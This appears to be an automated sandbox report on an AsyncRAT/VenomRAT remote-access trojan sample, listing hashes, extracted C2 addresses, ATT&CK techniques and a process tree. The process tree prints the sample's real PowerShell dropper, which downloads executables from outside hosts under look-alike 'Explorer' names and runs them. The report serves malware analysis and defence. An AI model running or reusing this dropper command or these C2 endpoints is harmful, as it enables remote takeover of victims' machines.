asyncrat | 87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212

Analysis

max time kernel
150s
max time network
137s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
11-10-2024 21:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

75KB
MD5

0cc47ff18d0e3298f9beab60d3aa579e
SHA1

67c3020a046707cbde4dea02352272d6e6b77189
SHA256

87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212
SHA512

e0f0627aa715665a27e3b505af264c3c2500b9414764d028fa0ecba0dc979a187f75baf4f97b4793b31325dda65310d8a3e3eccfe676b1f7b13e47334b5fe5b3
SSDEEP

1536:fukU0OSeCX/PMRkYKt2OlY6H1bf/i7AkzkiLVclN:fXUHjAPMRkYv4jH1bfVk7BY

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

51.254.53.24:4449

86.68.222.14:4449

Mutex

ygfmgwcmzefwhl

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral1/memory/2420-1-0x0000000001010000-0x0000000001028000-memory.dmp	VenomRAT

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2564	powershell.exe
2768	powershell.exe
3000	powershell.exe
2780	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2564	powershell.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2768	powershell.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe
2420	Client.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	Client.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2420	Client.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 2488	2420	Client.exe	31
PID 2420 wrote to memory of 2488	2420	Client.exe	31
PID 2420 wrote to memory of 2488	2420	Client.exe	31
PID 2488 wrote to memory of 2564	2488	cmd.exe	33
PID 2488 wrote to memory of 2564	2488	cmd.exe	33
PID 2488 wrote to memory of 2564	2488	cmd.exe	33
PID 2488 wrote to memory of 2768	2488	cmd.exe	34
PID 2488 wrote to memory of 2768	2488	cmd.exe	34
PID 2488 wrote to memory of 2768	2488	cmd.exe	34
PID 2488 wrote to memory of 3000	2488	cmd.exe	35
PID 2488 wrote to memory of 3000	2488	cmd.exe	35
PID 2488 wrote to memory of 3000	2488	cmd.exe	35
PID 2488 wrote to memory of 2780	2488	cmd.exe	36
PID 2488 wrote to memory of 2780	2488	cmd.exe	36
PID 2488 wrote to memory of 2780	2488	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bffa462d542eb5cfe38495cff249d55d

SHA1
977d8262cb189af7e5455804cafcbf0e356fabbd

SHA256
7bc7158236d90adeedd0d3b51daf105b64dba4437c33d798fc30320dbb36fbe7

SHA512
193a17c26197afe05e2d0812de581456ea6ac1bfdd7de904ec11c0b816b9a251fbfe30b441172189292611f53236c3064685616933432c527165592962b4c648

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2d9b6feefd7d7073fb7429b42b3473d

SHA1
1cbdf5f6750c86053a78d806c1e92812dd39acba

SHA256
48006dec7b45db7defb2869cbb48ad606d2406018e1f5fc9a68ac664f64ae1bb

SHA512
deb9e04cbdb7682c2751bb5f8293d8b63a1f4621049582cf19939bffdf9b6d607ccc6f3447b3bc6b74bf738232bddf1a9c66d39b93c18fac4847fe281c15f8b1

Download Submit
memory/2420-0-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

Filesize
4KB

Download
memory/2420-1-0x0000000001010000-0x0000000001028000-memory.dmp

Filesize
96KB

Download
memory/2420-9-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-28-0x000007FEF51C3000-0x000007FEF51C4000-memory.dmp

Filesize
4KB

Download
memory/2420-29-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-7-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download
memory/2564-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2768-15-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2768-16-0x0000000000680000-0x0000000000688000-memory.dmp

Filesize
32KB

Download